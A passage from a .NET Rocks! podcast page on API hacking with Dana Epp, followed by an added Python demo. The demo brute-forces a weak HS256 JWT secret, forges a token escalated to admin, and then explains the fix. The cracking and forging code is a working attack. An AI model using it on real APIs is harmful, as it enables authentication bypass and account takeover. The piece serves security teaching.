
Hacking APIs with Dana Epp
.NET Rocks!
DevOps
A lot of times, especially when building out microservices, you're using these default configs for infrastructure as code, deploying it out, and not thinking about things like the signing keys for that service. When I do an engagement I'll always try to crack six characters, because for me, spending three bucks to determine if they have a weak signing key is worth it. If you can forge a token to give you more privileges, the game's over, right? Even if it's not vertical, escalating into a higher privilege, even just horizontal: going in and being able to jump in as anyone else. So we talked about the OWASP Top Ten. Authentication problems seem to be that, when I look at this API Security Top 10 list, there's
Transcript excerpt, from 20:12 in the episode.
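The attack Dana describes, a brute-force of a short HS256 signing secret followed by forging a token with escalated claims, as an added example that is not part of the episode or the show's own material. It uses only the Python standard library (no PyJWT), the header, claims and the weak secret `k3y` are constructed for the demo, and the search space is deliberately shrunk to three characters so it finishes in seconds; against a real six-character secret you would hand the token to hashcat (mode 16500) on a GPU, which is the "three bucks" in the quote.

```python
import base64
import hashlib
import hmac
import itertools
import json
import string


def b64url_encode(data: bytes) -> str:
    """JWT base64url: no padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    """Re-add the padding JWT strips before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Produce header.payload.signature with HMAC-SHA256 over the first two parts."""
    signing_input = ".".join(
        b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: str) -> bool:
    """What the API does on every request: recompute the MAC and compare in constant time."""
    head, body, sig = token.split(".")
    expected = hmac.new(secret.encode(), f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig))


def crack_hs256(token: str, charset: str, max_len: int):
    """Offline brute force: no requests to the target, just HMAC until the signature matches.
    The work is pure CPU; a GPU cracker does exactly this, orders of magnitude faster."""
    head, body, sig = token.split(".")
    signing_input = f"{head}.{body}".encode()
    target = b64url_decode(sig)
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            candidate = "".join(combo)
            if hmac.new(candidate.encode(), signing_input, hashlib.sha256).digest() == target:
                return candidate
    return None


def forge_token(token: str, secret: str, **claim_overrides) -> str:
    """Keep the original header and claims, overwrite the ones we want, re-sign with the recovered key."""
    head, body, _ = token.split(".")
    header = json.loads(b64url_decode(head))
    payload = json.loads(b64url_decode(body))
    payload.update(claim_overrides)
    return sign_hs256(header, payload, secret)


WEAK_SECRET = "k3y"  # constructed weak secret standing in for a default/short config value


def demo():
    """Returns (recovered secret, forged token, whether the API would accept the forgery)."""
    header = {"alg": "HS256", "typ": "JWT"}
    payload = {"sub": "alice", "role": "user"}  # constructed claims
    captured = sign_hs256(header, payload, WEAK_SECRET)  # the token an attacker already holds

    recovered = crack_hs256(captured, string.ascii_lowercase + string.digits, max_len=3)
    if recovered is None:
        return None, None, False

    # Horizontal move (become bob) and vertical move (become admin) in one forged token.
    forged = forge_token(captured, recovered, sub="bob", role="admin")
    return recovered, forged, verify_hs256(forged, WEAK_SECRET)


if __name__ == "__main__":
    secret, token, accepted = demo()
    print(f"recovered secret={secret!r} accepted_by_api={accepted}")
    print(token)
```

The check a practitioner wants from this is the last return value: `verify_hs256` is the server's own validation logic, and it returns True for the forged token, which is why a weak HMAC secret is a full authentication bypass rather than an information leak. The fix is a randomly generated secret of at least 256 bits (or an asymmetric algorithm such as RS256/ES256 with the private key kept off the API hosts), set per environment rather than inherited from a template.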


